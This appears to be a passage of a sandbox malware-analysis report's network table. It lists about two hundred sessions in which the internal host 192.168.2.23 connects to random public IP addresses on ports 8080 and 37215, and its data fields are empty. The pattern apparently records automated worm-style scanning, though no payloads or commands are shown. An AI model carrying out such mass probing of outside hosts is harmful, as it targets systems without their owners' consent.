                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18459192.168.2.234586041.131.175.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18460192.168.2.2353460157.119.151.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18461192.168.2.2337632157.65.137.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18462192.168.2.2344066157.60.219.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18463192.168.2.2353780119.214.132.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18464192.168.2.235420438.115.127.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18465192.168.2.2338860204.175.95.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18466192.168.2.234795274.253.116.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18467192.168.2.234695642.100.79.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18468192.168.2.236081452.42.66.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18469192.168.2.2335952140.30.157.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18470192.168.2.234337680.148.165.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18471192.168.2.235588236.42.241.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18472192.168.2.235861062.213.150.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18473192.168.2.2339156105.227.45.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18474192.168.2.235886897.209.74.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18475192.168.2.2350550221.57.199.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18476192.168.2.2343472119.93.120.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18477192.168.2.233959854.77.168.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18478192.168.2.2337732199.197.249.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18479192.168.2.2351190124.17.123.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18480192.168.2.23514445.200.224.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18481192.168.2.2332990124.97.73.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18482192.168.2.233579663.9.241.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18483192.168.2.2337290162.210.196.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18484192.168.2.235650043.237.208.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18485192.168.2.2334502167.65.201.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18486192.168.2.2339076108.46.129.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18487192.168.2.235109225.58.92.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18488192.168.2.235849069.83.176.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18489192.168.2.235911447.56.178.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18490192.168.2.235798067.56.181.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18491192.168.2.233994074.133.223.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18492192.168.2.2333242155.247.175.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18493192.168.2.235038263.163.17.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18494192.168.2.2335956122.102.235.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18495192.168.2.2352246156.164.90.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18496192.168.2.2347028187.202.141.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18497192.168.2.2345924222.47.46.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18498192.168.2.2336900105.220.58.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18499192.168.2.235533883.108.45.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18500192.168.2.2351598184.47.152.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18501192.168.2.2349052191.120.192.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18502192.168.2.2339976148.78.238.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18503192.168.2.235593271.32.31.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18504192.168.2.2360730204.80.109.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18505192.168.2.235174296.28.13.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18506192.168.2.234290076.233.100.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18507192.168.2.236065074.197.10.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18508192.168.2.2360516217.238.194.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18509192.168.2.2355028142.176.198.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18510192.168.2.2349896170.32.86.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18511192.168.2.234962280.48.145.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18512192.168.2.234544285.186.168.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18513192.168.2.2353366162.185.206.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18514192.168.2.235425873.232.185.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18515192.168.2.2342160102.140.195.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18516192.168.2.2346604131.233.129.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18517192.168.2.235719835.180.181.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18518192.168.2.2333162158.195.47.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18519192.168.2.234104680.241.235.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18520192.168.2.2341430205.71.90.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18521192.168.2.2343526206.173.244.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18522192.168.2.235240019.93.189.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18523192.168.2.233756499.224.151.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18524192.168.2.2358906146.239.37.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18525192.168.2.235257880.186.105.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18526192.168.2.2340198117.26.78.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18527192.168.2.2333512125.128.92.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18528192.168.2.234011847.90.160.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18529192.168.2.234294476.192.71.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18530192.168.2.234815073.119.62.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18531192.168.2.235285435.11.97.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18532192.168.2.235276450.35.57.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18533192.168.2.2338294177.76.184.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18534192.168.2.2340600140.54.85.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18535192.168.2.234241494.0.21.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18536192.168.2.234853420.77.159.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18537192.168.2.2344108177.12.216.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18538192.168.2.2350034158.77.231.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18539192.168.2.235902076.164.178.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18540192.168.2.2359538201.81.116.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18541192.168.2.2339634128.69.189.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18542192.168.2.2349400110.179.98.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18543192.168.2.234233651.136.29.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18544192.168.2.2357212128.101.211.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18545192.168.2.2337174169.96.27.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18546192.168.2.2353660168.71.19.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18547192.168.2.2337142173.81.124.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18548192.168.2.2356604187.249.224.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18549192.168.2.2340576109.199.6.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18550192.168.2.2350190136.95.55.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18551192.168.2.2346758190.168.168.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18552192.168.2.234964418.59.48.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18553192.168.2.2338812216.131.26.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18554192.168.2.234238675.150.30.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18555192.168.2.2349938182.102.92.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18556192.168.2.2340256157.133.118.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18557192.168.2.2333426191.45.239.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18558192.168.2.234356287.124.173.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18559192.168.2.2348512158.168.243.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18560192.168.2.2348084178.43.170.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18561192.168.2.2344224105.126.245.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18562192.168.2.235312866.155.243.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18563192.168.2.2346914188.23.222.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18564192.168.2.2341230219.240.191.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18565192.168.2.2348176155.189.183.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18566192.168.2.2347974141.54.40.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18567192.168.2.2332788221.225.201.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18568192.168.2.2345204106.171.238.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18569192.168.2.2346692191.125.199.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18570192.168.2.235405067.53.195.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18571192.168.2.2338046151.146.221.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18572192.168.2.235391444.161.74.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18573192.168.2.233627434.255.140.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18574192.168.2.235768665.106.242.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18575192.168.2.2345934173.193.252.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18576192.168.2.233625212.51.51.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18577192.168.2.2346652173.225.39.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18578192.168.2.2349856164.46.45.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18579192.168.2.2353386187.206.82.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18580192.168.2.235682237.47.84.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18581192.168.2.2360902196.171.196.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18582192.168.2.2336540145.86.124.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18583192.168.2.2350290185.21.181.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18584192.168.2.233280687.97.253.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18585192.168.2.2342588166.179.150.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18586192.168.2.2353176115.139.114.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18587192.168.2.2350404216.226.56.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18588192.168.2.234781446.106.57.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18589192.168.2.234079484.123.19.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18590192.168.2.2341150203.210.172.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18591192.168.2.2358664157.153.63.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18592192.168.2.234022489.38.191.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18593192.168.2.2358866208.2.230.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18594192.168.2.2354790200.116.213.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18595192.168.2.2356934100.29.10.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18596192.168.2.2333574136.231.144.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18597192.168.2.234709825.97.144.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18598192.168.2.235015650.214.21.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18599192.168.2.235529071.57.222.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18600192.168.2.234707473.135.85.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18601192.168.2.2355978121.136.105.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18602192.168.2.2359914102.160.45.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18603192.168.2.2355870157.142.131.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18604192.168.2.2344244112.175.228.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18605192.168.2.2333016142.82.196.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18606192.168.2.234740019.101.218.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18607192.168.2.233998263.120.67.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18608192.168.2.2350122108.206.64.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18609192.168.2.2337280153.103.51.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18610192.168.2.233340012.44.16.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18611192.168.2.234365667.151.175.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18612192.168.2.2356170148.39.26.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18613192.168.2.233747234.244.95.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18614192.168.2.2359388139.152.39.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18615192.168.2.2358490121.106.203.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18616192.168.2.23573501.125.90.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18617192.168.2.2347130188.3.119.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18618192.168.2.2355980197.155.187.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18619192.168.2.2350060217.110.91.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18620192.168.2.234090841.90.203.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18621192.168.2.2357830157.198.103.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18622192.168.2.2342838144.179.77.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18623192.168.2.2341110157.64.48.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18624192.168.2.2338082157.239.22.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18625192.168.2.2343510181.199.86.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18626192.168.2.2354324197.27.192.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18627192.168.2.234654441.25.162.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18628192.168.2.2342182197.100.94.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18629192.168.2.2354584133.7.44.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18630192.168.2.234441041.215.130.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18631192.168.2.233676619.236.171.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18632192.168.2.2332952220.175.59.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18633192.168.2.2357190200.199.105.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18634192.168.2.233992441.106.193.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18635192.168.2.236063613.127.196.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18636192.168.2.234703241.40.144.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18637192.168.2.2346126157.80.206.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18638192.168.2.2347968197.183.168.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18639192.168.2.2343262197.146.215.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18640192.168.2.236060232.51.126.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18641192.168.2.2346798175.248.223.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18642192.168.2.2352742161.224.157.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18643192.168.2.234126641.55.61.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18644192.168.2.2338504212.31.227.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18645192.168.2.2343224197.3.181.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18646192.168.2.2349384184.22.150.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18647192.168.2.2357368199.165.143.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18648192.168.2.2348258216.154.59.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18649192.168.2.235466236.16.229.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18650192.168.2.2360918220.158.209.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18651192.168.2.233329683.13.105.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18652192.168.2.2351470206.67.39.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18653192.168.2.233642897.45.124.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18654192.168.2.2346360181.117.157.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18655192.168.2.236045844.162.10.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18656192.168.2.2338594203.180.245.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18657192.168.2.2332990139.183.203.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18658192.168.2.234239643.38.1.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18659192.168.2.2359854151.5.178.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18660192.168.2.2342016198.73.250.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18661192.168.2.235343835.228.216.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18662192.168.2.2359718140.50.109.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18663192.168.2.2338540101.103.48.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18664192.168.2.235160231.98.33.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18665192.168.2.233507251.18.54.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18666192.168.2.2339230145.103.88.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18667192.168.2.2346076110.29.240.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18668192.168.2.233721289.133.146.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
